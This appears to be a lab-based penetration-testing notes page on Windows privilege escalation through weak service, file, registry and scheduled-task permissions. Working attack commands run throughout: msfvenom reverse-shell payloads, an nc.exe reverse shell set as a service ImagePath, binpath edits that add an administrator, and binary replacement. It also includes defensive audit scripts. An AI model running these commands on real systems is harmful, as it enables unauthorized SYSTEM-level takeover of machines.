# Weak Permissions

## Services Issues

```powershell
# PowerUp

Get-ServiceUnquoted -Verbose # Unquoted path

Get-ModifiableServiceFile -Verbose # Current user can write to the binary path or change args to the binary

Get-ModifiableService -Verbose # Current user can modify configuration
```

## Permissive File System ACLs

### **Running SharpUp**

{% embed url="<https://github.com/GhostPack/SharpUp/>" %}

{% embed url="<https://github.com/r3motecontrol/Ghostpack-CompiledBinaries>" %}

{% embed url="<https://github.com/jakobfriedl/precompiled-binaries/raw/main/Enumeration/SharpUp.exe>" %}

```powershell-session
PS C:\htb> .\SharpUp.exe audit

=== SharpUp: Running Privilege Escalation Checks ===


=== Modifiable Service Binaries ===

  Name             : SecurityService
  DisplayName      : PC Security Management Service
  Description      : Responsible for managing PC security
  State            : Stopped
  StartMode        : Auto
  PathName         : "C:\Program Files (x86)\PCProtect\SecurityService.exe"
  
  <SNIP>
```

### ACEshark

{% embed url="<https://github.com/t3l3machus/ACEshark>" %}

### **Checking Permissions with icacls**

`icacls` can check permissions, set ownership of a folder, and set, remove or deny permissions.

```powershell-session
# Check permissions
PS C:\> icacls C:\folder_name
(...)
```

Rights and flags shown in the output:

* `I` - permission inherited from the parent container
* `F` - full access (full control)
* `M` - modify access
* `OI` - object inherit
* `IO` - inherit only
* `CI` - container inherit
* `RX` - read and execute
* `AD` - append data (add subdirectories)
* `WD` - write data and add files

```powershell-session
# Set ownership
PS C:\> icacls C:\folder_name /setowner Username
```

```powershell-session
PS C:\htb> icacls "C:\Program Files (x86)\PCProtect\SecurityService.exe"

C:\Program Files (x86)\PCProtect\SecurityService.exe BUILTIN\Users:(I)(F)
                                                     Everyone:(I)(F)
                                                     NT AUTHORITY\SYSTEM:(I)(F)
                                                     BUILTIN\Administrators:(I)(F)
                                                     APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                                     APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
```

The `Everyone` and `BUILTIN\Users` groups have been granted full control (`F`) over the service binary, inherited (`I`) from its directory.

### **Replacing Service Binary**

```cmd-session
C:\htb> cmd /c copy /Y SecurityService.exe "C:\Program Files (x86)\PCProtect\SecurityService.exe"
C:\htb> sc start SecurityService
```

Make a backup of the original binary and replace it with a malicious binary generated with `msfvenom`. It can give us a reverse shell as `SYSTEM`, or add a local admin user and give us full administrative control over the machine.

```shell-session
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.15.76 LPORT=443 -f exe > SecurityService.exe
```

## Weak Service Permissions

```cmd-session
C:\htb> SharpUp.exe audit
 
=== SharpUp: Running Privilege Escalation Checks ===
 
 
=== Modifiable Services ===
 
  Name             : WindscribeService
  DisplayName      : WindscribeService
  Description      : Manages the firewall and controls the VPN tunnel
  State            : Running
  StartMode        : Auto
  PathName         : "C:\Program Files (x86)\Windscribe\WindscribeService.exe"
```

### **Checking Permissions with AccessChk**

```cmd-session
C:\htb> accesschk.exe /accepteula -quvcw WindscribeService
 
Accesschk v6.13 - Reports effective permissions for securable objects
Copyright © 2006-2020 Mark Russinovich
Sysinternals - www.sysinternals.com
 
WindscribeService
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\SYSTEM
        SERVICE_ALL_ACCESS
  RW BUILTIN\Administrators
        SERVICE_ALL_ACCESS
  RW NT AUTHORITY\Authenticated Users
        SERVICE_ALL_ACCESS
```

All Authenticated Users have [SERVICE\_ALL\_ACCESS](https://docs.microsoft.com/en-us/windows/win32/services/service-security-and-access-rights) rights over the service, which includes `SERVICE_CHANGE_CONFIG`.
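The AccessChk output above can be reproduced fleet-wide as an audit. The following PowerShell script is an added example, not code from the original page: it pulls each service's SDDL with `sc.exe sdshow`, keeps the raw access mask, and reports any allow ACE that gives a broad group (Everyone, Users, Authenticated Users, INTERACTIVE) `SERVICE_CHANGE_CONFIG`, `WRITE_DAC`, `WRITE_OWNER` or a generic write/all right.

```powershell
# Added audit example, not code from the original page: list services whose DACL
# grants reconfiguration rights to broad groups. sc.exe sdshow returns the SDDL and
# RawSecurityDescriptor keeps the raw access mask, so the SERVICE_* bits are exact.
$SERVICE_CHANGE_CONFIG = 0x00000002   # enough to change binPath, as shown on this page
$WRITE_DAC             = 0x00040000   # can rewrite the service DACL itself
$WRITE_OWNER           = 0x00080000
$GENERIC_WRITE         = 0x40000000
$GENERIC_ALL           = 0x10000000
$RiskMask = $SERVICE_CHANGE_CONFIG -bor $WRITE_DAC -bor $WRITE_OWNER -bor $GENERIC_WRITE -bor $GENERIC_ALL

# Everyone, BUILTIN\Users, Authenticated Users, INTERACTIVE
$BroadSids = @('S-1-1-0', 'S-1-5-32-545', 'S-1-5-11', 'S-1-5-4')

function Get-ServiceSddl {
    param([string]$Name)
    # sc.exe is spelled out because "sc" is an alias for Set-Content in PowerShell
    $lines = & sc.exe sdshow $Name 2>$null
    ($lines | ForEach-Object { $_.Trim() } | Where-Object { $_ -match '^[DOGS]:' }) -join ''
}

function Find-WeakServiceDacl {
    foreach ($svc in Get-CimInstance Win32_Service) {
        $sddl = Get-ServiceSddl -Name $svc.Name
        if (-not $sddl) { continue }    # sdshow failed (e.g. access denied)
        $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($sddl)
        foreach ($ace in $sd.DiscretionaryAcl) {
            if ($ace.AceType -ne [System.Security.AccessControl.AceType]::AccessAllowed) { continue }
            if ($BroadSids -notcontains $ace.SecurityIdentifier.Value) { continue }
            if (($ace.AccessMask -band $RiskMask) -eq 0) { continue }
            [pscustomobject]@{
                Service   = $svc.Name
                RunsAs    = $svc.StartName
                Principal = $ace.SecurityIdentifier.Translate([System.Security.Principal.NTAccount]).Value
                Mask      = '0x{0:X}' -f $ace.AccessMask
                PathName  = $svc.PathName
            }
        }
    }
}

# The Windscribe finding on this page would show Principal = NT AUTHORITY\Authenticated Users, Mask = 0xF01FF
Find-WeakServiceDacl | Format-Table -AutoSize
```

Any row whose `RunsAs` is `LocalSystem` is the case described in this section; the fix is to restrict the service DACL (for example with `sc.exe sdset`) or to reinstall the software with vendor-corrected permissions.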

### **Check Local Admin Group**

```cmd-session
C:\htb> net localgroup administrators

Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain
 
Members
 
-------------------------------------------------------------------------------
Administrator
mrb3n
The command completed successfully.
```

`htb-student` is not a member.

### **Changing the Service Binary Path**

```cmd-session
C:\htb> sc config WindscribeService binpath="cmd /c net localgroup administrators htb-student /add"

[SC] ChangeServiceConfig SUCCESS
```

**Stopping and Starting Service**

```cmd-session
C:\htb> sc stop WindscribeService
```

```cmd-session
C:\htb> sc start WindscribeService

[SC] StartService FAILED 1053:
 
The service did not respond to the start or control request in a timely fashion.
```

The command we placed in the `binpath` will run even though an error message is returned. The service fails to start because the `binpath` is not pointing to an actual service executable, so the process never reports its status back to the Service Control Manager.

### **Confirming Local Admin Group Addition**

```cmd-session
C:\htb> net localgroup administrators

Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain
 
Members
 
-------------------------------------------------------------------------------
Administrator
htb-student
mrb3n
The command completed successfully.
```

### Cleanup

```cmd-session
C:\htb> sc config WindScribeService binpath="c:\Program Files (x86)\Windscribe\WindscribeService.exe"
```

```cmd-session
C:\htb> sc start WindScribeService
```

```cmd-session
C:\htb> sc query WindScribeService
```

### Other example - Insecure Service Permissions

**Before starting exploitation**

* Create a reverse shell: `msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f exe -o reverse.exe`
* Transfer reverse.exe to the victim machine

**Exploitation**

1. Use [**AccessChk**](https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk) to check the user account's permissions on the service. Example with username `user` and service `daclsvc`: `C:\PrivEsc\accesschk.exe /accepteula -uwcqv user daclsvc`
2. Look for the **permission to change the service configuration**: `SERVICE_CHANGE_CONFIG`
3. Query the service: `sc qc daclsvc`
4. Check that the service runs with **SYSTEM privileges** (`SERVICE_START_NAME`)
5. Modify the service config and **set the BINARY\_PATH\_NAME** (binpath) to reverse.exe: `sc config daclsvc binpath= "\"C:\PrivEsc\reverse.exe\""`
6. Start a listener on Kali and then start the service to spawn a reverse shell running with SYSTEM privileges: `net start daclsvc`

### Other example - Insecure Service Executables

1. Query the "filepermsvc" service and note that it **runs with SYSTEM privileges** (SERVICE\_START\_NAME): `sc qc filepermsvc`
2. Using accesschk.exe, note that the **service binary (BINARY\_PATH\_NAME) file is writable by everyone**: `C:\PrivEsc\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"`
3. Copy the reverse.exe executable you created (cf. Insecure Service Permissions - before starting exploitation) and **replace** the filepermservice.exe with it: `copy C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe" /Y`
4. Start a listener on Kali and then start the service to spawn a reverse shell running with SYSTEM privileges: `net start filepermsvc`

## Unquoted Service Path

### **Service Binary Path**

```shell-session
C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe
```

Windows will attempt to load the following potential executables in order on service start, with a .exe being implied:

* `C:\Program`
* `C:\Program Files`
* `C:\Program Files (x86)\System`
* `C:\Program Files (x86)\System Explorer\service\SystemExplorerService64`

If we can create the following files, we would be able to hijack the service binary and gain command execution in the context of the service, in this case, `NT AUTHORITY\SYSTEM`.

* `C:\Program.exe`
* `C:\Program Files (x86)\System.exe`

However, creating files in the root of the drive or the program files folder requires administrative privileges.

### **Searching for Unquoted Service Paths**

```cmd-session
C:\htb> wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
GVFS.Service                                                                        GVFS.Service                              C:\Program Files\GVFS\GVFS.Service.exe                                                 Auto
System Explorer Service                                                             SystemExplorerHelpService                 C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe             Auto
WindscribeService                                                                   WindscribeService                         C:\Program Files (x86)\Windscribe\WindscribeService.exe                                  Auto
```
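The lookup order described above can be turned into an audit that goes one step further than the wmic query: for every unquoted service path it lists the prefixes Windows probes and checks whether a broad group (Everyone, Users, Authenticated Users, INTERACTIVE) can create files in the directory each probed file would live in. This PowerShell script is an added example, not code from the original page; it skips inherit-only ACEs, so the default `Authenticated Users (IO)(M)` entry on `C:\` does not make the drive root look creatable, matching the caveat above.

```powershell
# Added audit example, not code from the original page.
$BroadSids = @('S-1-1-0', 'S-1-5-32-545', 'S-1-5-11', 'S-1-5-4')  # Everyone, Users, Authenticated Users, INTERACTIVE

function Get-UnquotedPathCandidates {
    param([string]$PathName)
    # Only the executable portion takes part in the lookup; drop any arguments after ".exe".
    $exe = $PathName
    $m = [regex]::Match($PathName, '^(.*?\.exe)', 'IgnoreCase')
    if ($m.Success) { $exe = $m.Groups[1].Value }
    $parts = $exe -split ' '
    # Each prefix ending just before a space is a file Windows tries before the real binary.
    for ($i = 1; $i -lt $parts.Count; $i++) { $parts[0..($i - 1)] -join ' ' }
}

function Test-BroadCreateFileAccess {
    param([string]$Directory)
    $acl = Get-Acl -LiteralPath $Directory -ErrorAction SilentlyContinue
    if (-not $acl) { return $false }
    $createFiles = [int][System.Security.AccessControl.FileSystemRights]::CreateFiles
    $inheritOnly = [int][System.Security.AccessControl.PropagationFlags]::InheritOnly
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        # Inherit-only ACEs (e.g. Authenticated Users "(IO)(M)" on C:\) apply to children, not this folder.
        if (([int]$ace.PropagationFlags -band $inheritOnly) -ne 0) { continue }
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { continue }
        if ($BroadSids -notcontains $sid) { continue }
        if (([int]$ace.FileSystemRights -band $createFiles) -ne 0) { return $true }
    }
    return $false
}

function Find-UnquotedServicePaths {
    foreach ($svc in Get-CimInstance Win32_Service) {
        $p = $svc.PathName
        if (-not $p -or $p.StartsWith('"')) { continue }        # quoted paths are not affected
        if ($p -match '^[A-Za-z]:\\Windows\\') { continue }     # same exclusion as the wmic query above
        foreach ($cand in Get-UnquotedPathCandidates -PathName $p) {
            [pscustomobject]@{
                Service      = $svc.Name
                RunsAs       = $svc.StartName
                ProbedFile   = "$cand.exe"
                DirCreatable = Test-BroadCreateFileAccess -Directory (Split-Path -Path $cand -Parent)
            }
        }
    }
}

Find-UnquotedServicePaths | Format-Table -AutoSize
```

For the System Explorer path above this yields `C:\Program.exe`, `C:\Program Files.exe` and `C:\Program Files (x86)\System.exe`; only a row with `DirCreatable` true is a real finding, and quoting the `ImagePath` (`sc.exe config <name> binPath= "\"<full path>\""`) removes it.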

### Example - IObitUnSvr

{% embed url="<https://www.exploit-db.com/exploits/47538>" %}

```shell-session
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.2 LPORT=4444 -f exe > IObit.exe
```

The current user has no write permission on the unquoted path.

Get-ServiceAcl.ps1: <https://gist.github.com/cube0x0/1cdef7a90473443f72f28df085241175>

```powershell
Import-Module "C:/Users/username/Desktop/Get-ServiceAcl.ps1"
"IObitUnSvr" | Get-ServiceAcl | select -ExpandProperty Access
```

The current user does, however, have rights to change the service configuration.

```powershell
sc.exe config IObitUnSvr binPath="cmd.exe /c "C:\Users\username\Desktop\IObit.exe""
sc.exe stop IObitUnSvr
sc.exe start IObitUnSvr
```

### Other example - Unquoted Service Path

1. Query the "unquotedsvc" service and note that it runs with **SYSTEM privileges** (SERVICE\_START\_NAME) and that the **BINARY\_PATH\_NAME is unquoted and contains spaces**. `sc qc unquotedsvc` Ex: `BINARY_PATH_NAME : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe`
2. Using accesschk.exe, note that the BUILTIN\Users group is **allowed to write** to the C:\Program Files\Unquoted Path Service\ directory: `C:\PrivEsc\accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"`
3. **Copy** the reverse.exe (cf. Insecure Service Permissions - before starting exploitation) executable you created to this directory and **rename it Common.exe**: `copy C:\PrivEsc\reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"`
4. Start a listener on Kali and then start the service to spawn a reverse shell running with SYSTEM privileges: `net start unquotedsvc`

## Permissive Registry ACLs

### **Checking for Weak Service ACLs in Registry**

```cmd-session
C:\htb> accesschk.exe /accepteula "mrb3n" -kvuqsw hklm\System\CurrentControlSet\services

Accesschk v6.13 - Reports effective permissions for securable objects
Copyright © 2006-2020 Mark Russinovich
Sysinternals - www.sysinternals.com

RW HKLM\System\CurrentControlSet\services\ModelManagerService
        KEY_ALL_ACCESS

<SNIP> 
```

### **Changing ImagePath with PowerShell**

```powershell-session
PS C:\htb> Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\john\Downloads\nc.exe -e cmd.exe 10.10.10.205 443"
```

### Other example - Weak Registry Permissions

1. Query the "regsvc" service and note that it **runs with SYSTEM privileges** (SERVICE\_START\_NAME): `sc qc regsvc`
2. Using accesschk.exe, note that the registry entry for the regsvc service is **writable by the "NT AUTHORITY\INTERACTIVE" group** (essentially all logged-on users): `C:\PrivEsc\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc`
3. **Overwrite the ImagePath registry key** to point to the reverse.exe executable you created (cf. Insecure Service Permissions - before starting exploitation): `reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f`
4. Start a listener on Kali and then start the service to spawn a reverse shell running with SYSTEM privileges: `net start regsvc`

## Modifiable Registry Autorun Binary

### **Check Startup Programs**

```powershell-session
PS C:\htb> Get-CimInstance Win32_StartupCommand | select Name, command, Location, User |fl

Name     : OneDrive
command  : "C:\Users\mrb3n\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
Location : HKU\S-1-5-21-2374636737-2633833024-1808968233-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
User     : WINLPE-WS01\mrb3n

Name     : Windscribe
command  : "C:\Program Files (x86)\Windscribe\Windscribe.exe" -os_restart
Location : HKU\S-1-5-21-2374636737-2633833024-1808968233-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
User     : WINLPE-WS01\mrb3n

Name     : SecurityHealth
command  : %windir%\system32\SecurityHealthSystray.exe
Location : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
User     : Public

Name     : VMware User Process
command  : "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
Location : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
User     : Public

Name     : VMware VM3DService Process
command  : "C:\WINDOWS\system32\vm3dservice.exe" -u
Location : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
User     : Public
```

Suppose we have write permissions to the registry for a given binary or can overwrite a binary listed. In that case, we may be able to escalate privileges to another user the next time that the user logs in.

### Other example - Registry - AutoRuns

1. Query the registry for AutoRun executables: `reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run`
2. Using accesschk.exe, note that **one of the AutoRun executables is writable by everyone**: `C:\PrivEsc\accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe"`
3. Copy the reverse.exe executable you created (cf. Insecure Service Permissions - before starting exploitation) and **overwrite the AutoRun executable** with it: `copy C:\PrivEsc\reverse.exe "C:\Program Files\Autorun Program\program.exe" /Y`
4. Start a listener on Kali and then restart the Windows VM. Open up a new RDP session to trigger a reverse shell running with admin privileges. You should not have to authenticate to trigger it; however, if the payload does not fire, log in as an admin (admin/password123) to trigger it. Note that in a real-world engagement, you would have to wait for an administrator to log in themselves! `rdesktop MACHINE_IP`

## Scheduled Task

View the contents of the C:\DevTools\CleanUp.ps1 script: `type C:\DevTools\CleanUp.ps1`

The script seems to be running as SYSTEM every minute. Using accesschk.exe, note that you have the ability to write to this file: `C:\PrivEsc\accesschk.exe /accepteula -quvw user C:\DevTools\CleanUp.ps1`

Start a listener on Kali and then append a line to the C:\DevTools\CleanUp.ps1 which runs the reverse.exe executable you created: `echo C:\PrivEsc\reverse.exe >> C:\DevTools\CleanUp.ps1`

Wait for the Scheduled Task to run, which should trigger the reverse shell as SYSTEM.

## Startup Apps

Check whether the all-users StartUp folder is writable: `C:\PrivEsc\accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"`

